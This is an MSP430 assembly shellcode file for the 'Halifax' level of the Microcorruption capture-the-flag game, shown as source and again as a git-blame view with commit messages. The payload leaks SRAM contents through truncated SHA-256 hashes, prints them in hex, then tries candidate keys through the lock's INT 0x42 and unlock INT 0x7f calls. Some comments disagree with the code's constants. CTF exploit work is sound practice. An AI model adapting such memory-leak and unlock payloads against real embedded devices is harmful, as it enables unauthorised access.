MicroCorruption/25-Halifax/shellcode.asm

; just hash the first 0x140 B and stick them in memory
; 6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b904001 f72b 3041

; Compile with this fork of msprobe:
const:
.define msize  0x1    ; length of each hash in bytes
.define hsize  0x3    ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
.define sr_len 0x140  ; number of bytes in sram to dump
.define ha_len 0x3c0  ; number of bytes in hash array (hsize * sr_len)
.define haddr  0x7000 ; address of the big hash array
.define iaddr  0x8000 ; address of the sram input buffer
.define kaddr  0x9000 ; address of the key buffer
external_data:
.define HEX_LUT 0x4710; "0123456789ABCDEF"
external_func:
; INT(int interrupt, ...)
.define INT             #0x4550
; getsn(void *dest, size_t len)
.define getsn           #0x4568
; putchar(char character)
.define putchar         #0x4578
; puts(char *str)
.define puts            #0x4586
; memcpy(void *dest, void *src, size_t len)
.define memcpy          #0x45a4
; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
.define sha256_internal #0x45b6
; memset(void* buf, char value, size_t length)
.define memset          #0x45c8

get_sram_hashes:
clr   r11            ; loop variable in r11
mov   #msize, r14    ; r14 = 1
mov   #haddr, r13    ; set destination to 0x8000
sr_loop:
mov   r11, r15       ; mov addr r15
call  sha256_internal; <sha256_internal>
add   #hsize, r13    ; keep 3 bytes of the output
inc   r11            ; inc r11
cmp   #sr_len, r11        ; do that 0x1000 times
jnc   sr_loop

print_hex:
clr   r11;
ph_loop:
mov.b haddr(r11), r14
mov.b r14, r15
rra   r15            ; using rra here instead of rra.b means the value won't roll into the highest bit
rra   r15            ; which negates the need to and 0xf, r15
rra   r15
rra   r15
clrc
and   #0xf, r14
mov.b HEX_LUT(r15), r15
call  putchar        ; <putchar>
mov.b HEX_LUT(r14), r15
call  putchar        ; <putchar>
inc   r11            ; inc r11
cmp   #ha_len, r11        ; do that sram_length*3 times
jnc   ph_loop

mov.b #0xa, r15      ; '\n'
call  #0x4578        ; putchar ('\n')


take_input:
; 3e4040003f400090b0126845
mov   #sr_len, r14
mov   #iaddr, r15
call  getsn          ; <getsn>

check_all_passwords:
;for i in 0..sr_len:
clr   r9
pw_loop:
; 	memcpy(kaddr, iaddr + i, len)
mov   #10, r13
mov   #iaddr, r14
add   r9, r14
mov   #kaddr, r15
call  memcpy
; INT (0x42, key)
push  #kaddr
push  #42
call  INT
add   #4, sp
; INT(7f)
unlock7f:
push  #0
push  #0
push  #7f
call  INT
add   #6, sp
inc   r9
cmp   #sr_len, r9
jl    pw_loop

end:
ret
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`; just hash the first 0x140 B and stick them in memory`
			`; 6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b904001 f72b 3041`

			`; Compile with this fork of msprobe:`
			`const:`
			`.define msize 0x1 ; length of each hash in bytes`
			`.define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`.define sr_len 0x140 ; number of bytes in sram to dump`
			`.define ha_len 0x3c0 ; number of bytes in hash array (hsize * sr_len)`
			`.define haddr 0x7000 ; address of the big hash array`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`.define iaddr 0x8000 ; address of the sram input buffer`
			`.define kaddr 0x9000 ; address of the key buffer`
			`external_data:`
			`.define HEX_LUT 0x4710; "0123456789ABCDEF"`
			`external_func:`
			`; INT(int interrupt, ...)`
			`.define INT #0x4550`
			`; getsn(void *dest, size_t len)`
			`.define getsn #0x4568`
			`; putchar(char character)`
			`.define putchar #0x4578`
			`; puts(char *str)`
			`.define puts #0x4586`
			`; memcpy(void dest, void src, size_t len)`
			`.define memcpy #0x45a4`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`.define sha256_internal #0x45b6`
			`; memset(void* buf, char value, size_t length)`
			`.define memset #0x45c8`

Upload what I've got on Halifax so far 2023-01-09 09:54:47 +00:00			`get_sram_hashes:`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`clr r11 ; loop variable in r11`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`mov #msize, r14 ; r14 = 1`
			`mov #haddr, r13 ; set destination to 0x8000`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`sr_loop:`
			`mov r11, r15 ; mov addr r15`
			`call sha256_internal; <sha256_internal>`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`add #hsize, r13 ; keep 3 bytes of the output`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`inc r11 ; inc r11`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`cmp #sr_len, r11 ; do that 0x1000 times`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`jnc sr_loop`
Upload what I've got on Halifax so far 2023-01-09 09:54:47 +00:00
			`print_hex:`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`clr r11;`
			`ph_loop:`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`mov.b haddr(r11), r14`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`mov.b r14, r15`
			`rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit`
			`rra r15 ; which negates the need to and 0xf, r15`
			`rra r15`
			`rra r15`
			`clrc`
			`and #0xf, r14`
			`mov.b HEX_LUT(r15), r15`
			`call putchar ; <putchar>`
			`mov.b HEX_LUT(r14), r15`
			`call putchar ; <putchar>`
			`inc r11 ; inc r11`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`cmp #ha_len, r11 ; do that sram_length*3 times`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`jnc ph_loop`

			`mov.b #0xa, r15 ; '\n'`
			`call #0x4578 ; putchar ('\n')`
Upload what I've got on Halifax so far 2023-01-09 09:54:47 +00:00

			`take_input:`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`; 3e4040003f400090b0126845`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`mov #sr_len, r14`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`mov #iaddr, r15`
			`call getsn ; <getsn>`

			`check_all_passwords:`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`;for i in 0..sr_len:`
			`clr r9`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`pw_loop:`
			`; memcpy(kaddr, iaddr + i, len)`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`mov #10, r13`
			`mov #iaddr, r14`
			`add r9, r14`
			`mov #kaddr, r15`
			`call memcpy`
			`; INT (0x42, key)`
			`push #kaddr`
			`push #42`
			`call INT`
			`add #4, sp`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`; INT(7f)`
Upload what I've got on Halifax so far 2023-01-09 09:54:47 +00:00			`unlock7f:`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`push #0`
			`push #0`
			`push #7f`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`call INT`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`add #6, sp`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`inc r9`
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`cmp #sr_len, r9`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`jl pw_loop`

25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 2023-07-05 00:23:11 +00:00			`end:`
Halifax: Push latest changes Requires assemble.py from Swiftloke's MSProbe to automatically compile 2023-01-18 01:10:31 +00:00			`ret`